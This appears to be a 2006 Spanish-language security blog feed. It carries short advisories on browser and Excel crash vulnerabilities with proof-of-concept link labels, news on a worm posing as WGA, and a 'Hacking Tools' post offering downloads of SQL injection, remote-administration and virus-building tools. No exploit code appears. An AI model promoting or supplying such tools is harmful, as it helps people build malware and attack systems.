Microsoft Internet Explorer es propenso a una condicion de denegacion de servicio cuando procesa el objeto'ADODB.Recordset Filter Property'.Un ataque exitoso puede hacer que el navegador falle debido a un null-pointer dereference.Prueba de ConceptoCreditos: hdm

Excel 2000/XP/2003 Style 0-day

2006-07-03T10:47:00.000-03:00

Detalles:Una vulnerabilidad ha sido descubierta en Microsoft Excel, que puede ser explotado por un atacante para comprometer el sistema de un usuario.Excel 2003 & XP EIP-> 00xx00xx Click Repair Mode .......Exploit....:P Excel 2000 Click Style EIP-> xxxxxxxx Prueba de Concepto

Paper: Como Funciona la heurística antivirus??? (Primera Parte)

2006-07-03T10:31:00.000-03:00

La heurística muchas veces es vista como magia, como esa capacidad que tiene una solución antivirus para clasificar como maliciosa una muestra sin tener consignada una firma específica para la misma. Una técnica “mágica” que permite marcar al software como sospechoso de tener un comportamiento potencialmente malicioso.Nada mas lejos de la realidad. El principio de la heurística es muy sencillo y

Hacking Tools...

2006-07-02T11:37:00.000-03:00

SQL Power InjectorDownloadTutorial--------------------------------------------------------------------------------------------Radmin v2.2 (final)Download--------------------------------------------------------------------------------------------JPS Virus MakerHerramienta para la confeccion de virus...Download o Download------------------------------------------------------------------------------

OPERA Web Browser 9 (iframe)Denial OF Service

2006-07-01T18:38:00.000-03:00

Author : Ahmad Muammar W.K (a.k.a) y3dipsAplicacion: Opera Web BrowserVersion : Opera/9.00 (X11; Linux i686; U; en) Opera/9.00 (Windows NT 5:1;U;en)DetallesLa vulnerabilidad puede ser explotada usando iframe combinado con javascript (documentos stylesheet) para crear un acceso de memoria fuera de límites.Prueba de Concepto

WindizUpdate: actualizar Windows sin usar Explorer

2006-07-01T18:33:00.000-03:00

Es probable que algunos usuarios de Windows sólo utilicen Explorer para bajarse parches o actualizaciones de Microsoft. Pues bien; WindizUpdate asegura que permite actualizar Windows desde Opera, Firefox y otros navegadores, aportando además -presuntamente- ciertas ventajas adicionales.Si alguien desea probar este plug-in, y comentar sus resultados...Mas info

Un gusano se disfraza de WGA...

2006-07-01T13:08:00.000-03:00

Cuebot-K es un nuevo gusano para Windows que se camufla en un fichero denominado "wgavn.exe", simulando ser software relacionado con WGA, la polémica utilidad antipiratería de Microsoft. Cuando logra instalarse en un sistema se registra como si fuera un driver denominado wgavn y se muestra en la lista de procesos en ejecución como "Windows Genuine Advantage Validation Notification". Según PC

WGA apagara pcs en septiembre???...

2006-07-01T00:15:00.000-03:00

La aplicación Windows Genuine Advantage, que se encarga de verificar la autenticidad de nuestra copia de Windows, podría causar que el PC se apagase si se detecta software ilegal. El rumor está ahí, y Microsoft no lo desmiente.ZDNet pidió a los chicos de Redmond que confirmaran o negaran estos rumores, pero no recibieron respuesta alguna. Actualmente este sistema de protección se encarga de

MS IE 7 beta Denial Of Service...

2006-06-30T19:13:00.000-03:00

Sofware afectado: Internet Explorer 7.0 BetaSeveridad: desconocidaImpacto: Denial Of ServiceSolucion: Sin ParchePrueba de Concepto